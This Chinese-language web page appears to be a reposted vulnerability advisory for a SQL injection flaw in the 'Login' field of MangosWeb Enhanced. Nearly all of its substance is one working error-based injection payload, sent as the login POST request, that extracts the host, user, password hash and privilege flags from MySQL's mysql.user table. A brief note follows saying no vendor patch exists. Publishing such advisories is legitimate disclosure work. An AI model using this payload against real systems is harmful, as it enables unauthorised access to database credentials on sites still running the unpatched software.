MangosWeb Enhanced 'Login'字段SQL注入漏洞(2)

日期:2020-06-07 栏目:程序人生 浏览:

login='and+(select 1 FROM(select+count(*),concat((select+concat(0x3a,host,0x3a,user,0x3a,password,0x3a,insert_priv,0x3a,file_priv,0x3a,super_priv) FROM mysql.user+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)--+-&pass=fubar&action=login&x=0&y=0

建议:
--------------------------------------------------------------------------------
厂商补丁:

MangosWeb
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

https://sites.google.com/site/mwenhanced/home

上一篇:简单谈谈require模块化jquery和angular的问题
下一篇:微信JS SDK接入的几点注意事项(必看篇)

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wyfssy.html

相关推荐